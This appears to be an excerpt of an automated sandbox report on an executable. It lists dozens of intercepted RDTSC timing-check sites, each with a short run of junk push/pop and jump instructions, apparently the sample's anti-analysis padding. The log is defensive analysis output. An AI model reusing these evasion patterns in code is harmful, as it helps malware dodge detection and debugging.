Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 36593B second address: 365963 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30E293C9h 0x00000007 jl 00007F9B30E293B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 365963 second address: 365970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jp 00007F9B30829926h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 365B37 second address: 365B3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 36D5F7 second address: 36D5FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 36D5FD second address: 36D601 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 36D601 second address: 36D617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9B30829930h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 36D617 second address: 36D621 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9B30E293C2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 36D621 second address: 36D627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 36B76B second address: 36B76F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 36B8D9 second address: 36B8EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push ebx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jno 00007F9B30829926h 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 36C526 second address: 36C52B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 36CAB3 second address: 36CAB8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 36CDC6 second address: 36CDCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 36CDCC second address: 36CDD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 36FB04 second address: 36FB17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F9B30E293BEh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 371253 second address: 371257 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2D30D4 second address: 2D30DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2D30DA second address: 2D30FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F9B30829934h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 379608 second address: 37960C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 37960C second address: 379618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 37977C second address: 37978D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F9B30E293B6h 0x0000000a jne 00007F9B30E293B6h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3798B8 second address: 3798CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnc 00007F9B30829926h 0x0000000c js 00007F9B30829926h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3798CA second address: 3798D0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 383340 second address: 38335B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9B3082992Ah 0x00000009 pop eax 0x0000000a jo 00007F9B30829928h 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 38335B second address: 383361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 383361 second address: 383367 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2BEDDA second address: 2BEDE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2BEDE3 second address: 2BEE0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9B30829939h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 381508 second address: 381515 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jg 00007F9B30E293B6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 381672 second address: 381678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 381C11 second address: 381C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F9B30E293B6h 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 381C1C second address: 381C38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B3082992Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F9B30829930h 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 381EDB second address: 381EDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 381EDF second address: 381EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 381EEC second address: 381EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 381EF7 second address: 381EFD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 382041 second address: 382047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3821B4 second address: 3821DB instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9B30829926h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F9B30829938h 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2CDF8E second address: 2CDFA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F9B30E293B6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2CDFA2 second address: 2CDFC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B3082992Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d popad 0x0000000e jne 00007F9B30829926h 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2CDFC5 second address: 2CE003 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30E293BCh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F9B30E293C1h 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push esi 0x00000015 pushad 0x00000016 popad 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a jl 00007F9B30E293B6h 0x00000020 jmp 00007F9B30E293BBh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2CE003 second address: 2CE007 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 2CE007 second address: 2CE00D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 39AF2D second address: 39AF33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 39AF33 second address: 39AF37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 39AF37 second address: 39AF3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 39AF3B second address: 39AF45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 39AF45 second address: 39AF4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 39AF4B second address: 39AF4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 39AF4F second address: 39AF63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007F9B3082992Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 39DBE6 second address: 39DBEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 39DBEA second address: 39DBFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a jo 00007F9B30829926h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 39D814 second address: 39D81D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 39D81D second address: 39D821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3ADD75 second address: 3ADDAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F9B30E293B6h 0x0000000a pop edi 0x0000000b pushad 0x0000000c jmp 00007F9B30E293BEh 0x00000011 jmp 00007F9B30E293C7h 0x00000016 jne 00007F9B30E293B6h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3B627B second address: 3B6298 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9B30829932h 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3B688F second address: 3B689B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 popad 0x00000008 push esi 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3B689B second address: 3B68AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F9B30829926h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3B68AA second address: 3B68AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3B6BE8 second address: 3B6BEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3B6BEC second address: 3B6BF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3B6D53 second address: 3B6D70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9B30829938h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3B77EB second address: 3B77F5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9B30E293B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3BB6FF second address: 3BB705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3BB705 second address: 3BB70A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3BB70A second address: 3BB722 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B3082992Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F9B30829926h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3BB722 second address: 3BB745 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop edx 0x00000010 jmp 00007F9B30E293C3h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3D8FA5 second address: 3D8FA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3DAFDB second address: 3DAFE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3DAFE1 second address: 3DAFEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3DABB6 second address: 3DABBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3DACFF second address: 3DAD07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3DAD07 second address: 3DAD3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9B30E293C1h 0x00000008 jmp 00007F9B30E293BEh 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 pushad 0x00000018 je 00007F9B30E293B6h 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3F3D89 second address: 3F3D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3F4050 second address: 3F4056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3F4056 second address: 3F4064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F9B30829926h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3F418D second address: 3F41AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9B30E293C5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3F41AE second address: 3F41B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3F41B4 second address: 3F41DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9B30E293BAh 0x00000009 jg 00007F9B30E293B6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9B30E293BEh 0x00000017 jg 00007F9B30E293B6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3F41DF second address: 3F41E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3F41E5 second address: 3F41EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3F44F8 second address: 3F44FD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3F466E second address: 3F4672 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3F4A3E second address: 3F4A42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3F4A42 second address: 3F4A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3F4A50 second address: 3F4A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9B3082992Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3F6504 second address: 3F6512 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3F6512 second address: 3F6516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3F7BFC second address: 3F7C02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3F7C02 second address: 3F7C2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9B3082992Ch 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9B30829934h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3FA597 second address: 3FA59B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3FA59B second address: 3FA59F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3FA59F second address: 3FA5A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3FA5A5 second address: 3FA5B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9B3082992Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3FA8DB second address: 3FA8DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8vZMEr8sm9.exe RDTSC instruction interceptor: First address: 3FA8DF second address: 3FA8E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
